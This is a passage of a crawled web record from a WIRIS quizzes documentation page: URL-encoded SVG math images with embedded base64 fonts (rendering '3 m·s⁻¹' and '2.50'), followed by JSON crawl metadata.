MAAP8gBIADqwAAAAoAAgABAAAAAAABAAAD6P9qAAAXcAAA%2F7YEgAABAAAAAAAAAAAAAAAAAAAAAwNSAFUBawCAA1YAgAAAAAAAAAAoAAAAWwAAAKUAAQAAAAMAXgAFAAAAAAACAIAEAAAAAAAEAADeAAAAAAAAABUBAgAAAAAAAAABABIAAAAAAAAAAAACAA4AEgAAAAAAAAADADAAIAAAAAAAAAAEABIAUAAAAAAAAAAFABYAYgAAAAAAAAAGAAkAeAAAAAAAAAAIABwAgQABAAAAAAABABIAAAABAAAAAAACAA4AEgABAAAAAAADADAAIAABAAAAAAAEABIAUAABAAAAAAAFABYAYgABAAAAAAAGAAkAeAABAAAAAAAIABwAgQADAAEECQABABIAAAADAAEECQACAA4AEgADAAEECQADADAAIAADAAEECQAEABIAUAADAAEECQAFABYAYgADAAEECQAGAAkAeAADAAEECQAIABwAgQBNAGEAdABoACAARgBvAG4AdABSAGUAZwB1AGwAYQByAE0AYQB0AGgAcwAgAEYAbwByACAATQBvAHIAZQAgAE0AYQB0AGgAIABGAG8AbgB0AE0AYQB0AGgAIABGAG8AbgB0AFYAZQByAHMAaQBvAG4AIAAxAC4AME1hdGhfRm9udABNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAAAMAAAAAAAAB9AD6AAAAAAAAAAAAAAAAAAAAAAAAAAC5BxEAAI2FGACyAAAAFRQTsQABPw%3D%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2219%22%3E3%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2215.5%22%20y%3D%2219%22%3Em%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1f9ece33f131ce1a9507d2cf938%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2226.5%22%20y%3D%2219%22%3E%26%23xB7%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2234.5%22%20y%3D%2219%22%3Es%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1f9ece33f131ce1a9507d2cf938%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2243.5%22%20y%3D%2212%22%3E%26%23x2212%3B%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2212%22%20text-anchor%3D%22middle%22%20x%3D%2251.5%22%20y%3D%2212%22%3E1%3C%2Ftext%3E%3C%2Fsvg%3E", null, "data:image/svg+xml;charset=utf8,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Awrs%3D%22http%3A%2F%2Fwww.wiris.com%2Fxml%2Fcvs-extension%22%20height%3D%2220%22%20width%3D%2233%22%20wrs%3Abaseline%3D%2216%22%3E%3C!--MathML%3A%20%3Cmath%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F1998%2FMath%2FMathML%22%3E%3Cmn%3E2%3C%2Fmn%3E%3Cmo%3E.%3C%2Fmo%3E%3Cmn%3E50%3C%2Fmn%3E%3C%2Fmath%3E--%3E%3Cdefs%3E%3Cstyle%20type%3D%22text%2Fcss%22%3E%40font-face%7Bfont-family%3A'math1d9d4f495e875a2e075a1a4a6e1'%3Bsrc%3Aurl(data%3Afont%2Ftruetype%3Bcharset%3Dutf-8%3Bbase64%2CAAEAAAAMAIAAAwBAT1MvMi7iBBMAAADMAAAATmNtYXDEvmKUAAABHAAAADRjdnQgDVUNBwAAAVAAAAA6Z2x5ZoPi2VsAAAGMAAAAbmhlYWQQC2qxAAAB%2FAAAADZoaGVhCGsXSAAAAjQAAAAkaG10eE2rRkcAAAJYAAAACGxvY2EAHTwYAAACYAAAAAxtYXhwBT0FPgAAAmwAAAAgbmFtZaBxlY4AAAKMAAABn3Bvc3QB9wD6AAAELAAAACBwcmVwa1uragAABEwAAAAUAAADSwGQAAUAAAQABAAAAAAABAAEAAAAAAAAAQEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAgICAAAAAg1UADev96AAAD6ACWAAAAAAACAAEAAQAAABQAAwABAAAAFAAEACAAAAAEAAQAAQAAAC7%2F%2FwAAAC7%2F%2F%2F%2FTAAEAAAAAAAABVAMsAIABAABWACoCWAIeAQ4BLAIsAFoBgAKAAKAA1ACAAAAAAAAAACsAVQCAAKsA1QEAASsABwAAAAIAVQAAAwADqwADAAcAADMRIRElIREhVQKr%2FasCAP4AA6v8VVUDAAABACAAAACgAIAAAwAvGAGwBBCwA9SwAxCwAtSwAxCwADywAhCwATwAsAQQsAPUsAMQsAI8sAAQsAE8MDE3MxUjIICAgIAAAAABAAAAAQAA1XjOQV8PPPUAAwQA%2F%2F%2F%2F%2F9Y6E3P%2F%2F%2F%2F%2F1joTcwAA%2FyAEgAOrAAAACgACAAEAAAAAAAEAAAPo%2F2oAABdwAAD%2FtgSAAAEAAAAAAAAAAAAAAAAAAAACA1IAVQDIACAAAAAAAAAAKAAAAG4AAQAAAAIAXgAFAAAAAAACAIAEAAAAAAAEAADeAAAAAAAAABUBAgAAAAAAAAABABIAAAAAAAAAAAACAA4AEgAAAAAAAAADADAAIAAAAAAAAAAEABIAUAAAAAAAAAAFABYAYgAAAAAAAAAGAAkAeAAAAAAAAAAIABwAgQABAAAAAAABABIAAAABAAAAAAACAA4AEgABAAAAAAADADAAIAABAAAAAAAEABIAUAABAAAAAAAFABYAYgABAAAAAAAGAAkAeAABAAAAAAAIABwAgQADAAEECQABABIAAAADAAEECQACAA4AEgADAAEECQADADAAIAADAAEECQAEABIAUAADAAEECQAFABYAYgADAAEECQAGAAkAeAADAAEECQAIABwAgQBNAGEAdABoACAARgBvAG4AdABSAGUAZwB1AGwAYQByAE0AYQB0AGgAcwAgAEYAbwByACAATQBvAHIAZQAgAE0AYQB0AGgAIABGAG8AbgB0AE0AYQB0AGgAIABGAG8AbgB0AFYAZQByAHMAaQBvAG4AIAAxAC4AME1hdGhfRm9udABNAGEAdABoAHMAIABGAG8AcgAgAE0AbwByAGUAAAMAAAAAAAAB9AD6AAAAAAAAAAAAAAAAAAAAAAAAAAC5BxEAAI2FGACyAAAAFRQTsQABPw%3D%3D)format('truetype')%3Bfont-weight%3Anormal%3Bfont-style%3Anormal%3B%7D%3C%2Fstyle%3E%3C%2Fdefs%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%224.5%22%20y%3D%2216%22%3E2%3C%2Ftext%3E%3Ctext%20font-family%3D%22math1d9d4f495e875a2e075a1a4a6e1%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2211.5%22%20y%3D%2216%22%3E.%3C%2Ftext%3E%3Ctext%20font-family%3D%22Arial%22%20font-size%3D%2216%22%20text-anchor%3D%22middle%22%20x%3D%2223.5%22%20y%3D%2216%22%3E50%3C%2Ftext%3E%3C%2Fsvg%3E", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9217359,"math_prob":0.90720236,"size":7559,"snap":"2019-43-2019-47","text_gpt3_token_len":1517,"char_repetition_ratio":0.14189279,"word_repetition_ratio":0.09025559,"special_character_ratio":0.20439212,"punctuation_ratio":0.116361074,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9928146,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-21T13:40:03Z\",\"WARC-Record-ID\":\"<urn:uuid:85787711-6c70-42af-8d4c-8add4af9f5eb>\",\"Content-Length\":\"153427\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0c717198-bf5a-4e9c-9d87-d964afe7e195>\",\"WARC-Concurrent-To\":\"<urn:uuid:5ea9f242-61de-4285-b0e8-43a53427718b>\",\"WARC-IP-Address\":\"99.84.216.88\",\"WARC-Target-URI\":\"https://docs.wiris.com/en/quizzes/user_interface/validation/validation\",\"WARC-Payload-Digest\":\"sha1:UJCHMCG2H4K6JQCM4VDCMLZMSLOODE2G\",\"WARC-Block-Digest\":\"sha1:HZX7ZT3OUHD7IL3QFB7H7L5ROFCWHILE\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570987773711.75_warc_CC-MAIN-20191021120639-20191021144139-00306.warc.gz\"}"}